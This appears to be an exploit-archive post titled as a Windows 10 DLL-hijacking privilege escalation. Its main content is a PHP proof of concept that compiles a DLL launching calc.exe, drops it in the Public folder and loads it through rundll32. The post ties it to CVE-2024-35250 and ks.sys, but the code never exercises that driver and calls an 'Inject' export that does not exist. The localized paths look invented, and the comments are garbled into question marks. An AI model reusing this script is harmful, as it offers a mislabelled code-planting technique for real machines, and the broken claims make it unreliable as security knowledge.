Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking

Microsoft Windows 10 Famille build 10.0.19045.5487, like many operating system Microsoft Windows 10 Famille build 10.0.19045.5487, like many operating system versions, could have been susceptible to DLL Hijacking vulnerabilities.

DLL Hijacking exploits how applications load Dynamic Link Libraries (DLLs). Instead of loading a legitimate system DLL, a vulnerable application could be tricked into loading a malicious one placed in a predictable location.

This typically occurs when an application searches for a DLL without specifying its full path, allowing an attacker to place a specially crafted DLL in a directory prioritized by the search order (e.g., current working directory).

Upon execution, the vulnerable application would then load and execute the attacker's malicious code. This could lead to arbitrary code execution, privilege escalation, or system compromise.

Such vulnerabilities are typically addressed through security updates from Microsoft. Users are always advised to keep their operating systems fully patched to mitigate known threats.

=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.

There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.

[+] What's new in this version?

Added DLL Hijacking exploit inside the code

Create a malicious DLL library directly from inside the code

Use rundll32.exe to automatically load the payload

Ensure all possible environments are supported (Windows 10 and 11)

Improved compatibility with different languages

(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .


[+] Usage : php poc.php

[+] PayLoad :

<?php
/**
* ??????? ???? CVE-2024-35250 ?? Windows ?? ??? ???? ?????? + DLL Hijacking
*/

function getWindowsLCID() {
$output = shell_exec('wmic os get locale /value');
preg_match('/Locale=(\w+)/', $output, $matches);
return isset($matches[1]) ? hexdec($matches[1]) : 1033; //
}

function localeToLanguage($locale) {
$languages = [
1033 => ['English', 'C:\\Users\\Public\\'], // en-US
1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
1046 => ['Portuguese', 'C:\\Usu?rios\\Public\\'], // pt-BR
1031 => ['German', 'C:\\Benutzer\\?ffentlich\\'], // de-DE
1049 => ['Russian', 'C:\\????????????\\?????\\'], // ru-RU
1056 => ['Persian', 'C:\\???????\\?????\\'], // fa-IR
1025 => ['Arabic', 'C:\\??????????\\???\\'], // ar-SA
1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
1114 => ['Aramaic', 'C:\\???????\\??????\\'], // ????????
1037 => ['Hebrew', 'C:\\???????\\??????\\'], // he-IL
2052 => ['Chinese (Simplified)', 'C:\\??\\??\\'], // zh-CN
1028 => ['Chinese (Traditional)', 'C:\\???\\??\\'], // zh-TW
1041 => ['Japanese', 'C:\\????\\?????\\'], // ja-JP
1042 => ['Korean', 'C:\\???\\??\\'], // ko-KR
1054 => ['Thai', 'C:\\??????\\???????\\'], // th-TH
1066 => ['Vietnamese', 'C:\\Ng??i d?ng\\C?ng c?ng\\'], // vi-VN
];

return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; //
}

function getPublicPath() {
$locale = getWindowsLCID();
list($lang, $path) = localeToLanguage($locale);
echo "[+] ??? ??????: $lang (LCID: $locale)\n";
return $path;
}

function is64BitWindows() {
return (PHP_INT_SIZE === 8);
}

function checkVulnerableDriver() {
$winDir = getenv('WINDIR');
$driverPath = $winDir . '\\system32\\drivers\\ks.sys';

if (!file_exists($driverPath)) {
die("[X] ?? ??? ?????? ??? ks.sys? ?????? ??? ???? ?????????.\n");
}

echo "[+] ks.sys ????? ?? ??????: $driverPath\n";
return true;
}

function getWindowsBuildNumber() {
$output = shell_exec('wmic os get BuildNumber /value');
preg_match('/BuildNumber=(\d+)/', $output, $matches);
return $matches[1] ?? null;
}

function isVulnerableVersion($buildNumber) {
$vulnerableBuilds = range(14393, 19045); // ?? Windows 10 1607 ??? Windows 10 22H2
return in_array($buildNumber, $vulnerableBuilds);
}

function createMaliciousDLL($dllPath) {
$dllCode = <<<EOD
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd.exe /c calc.exe"); // ?????? calc.exe ??? ????? ???? ???????
}
return TRUE;
}
EOD;

file_put_contents("payload.c", $dllCode);
shell_exec("gcc -shared -o $dllPath payload.c -mwindows");
}

function exploit() {
if (!is64BitWindows()) {
die("[X] ?????? ??? 64 ??? ????????? ??? ????.\n");
}

if (!checkVulnerableDriver()) {
die("[X] ?? ???? ?????? ?????????.\n");
}

$buildNumber = getWindowsBuildNumber();
if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
die("[X] ????? Windows ??? ?????: $buildNumber\n");
}

echo "[+] ?? ?????? ?? ??????? ???? ????? ?????? ????...\n";

$publicPath = getPublicPath();
$payloadPath = $publicPath . "exploit_payload.dll";

echo "[+] ???? ??????? ??????: $payloadPath\n";

createMaliciousDLL($payloadPath);

echo "[+] ?? ????? DLL ?????? ?????...\n";

$notepad = shell_exec('start /B notepad.exe'); // ????? notepad ???????? ??? DLL
sleep(1);

echo "[+] ?? ????? Notepad? ????? ???????...\n";
shell_exec("rundll32 $payloadPath,Inject"); // ????? ??????? ??? rundll32
}

exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================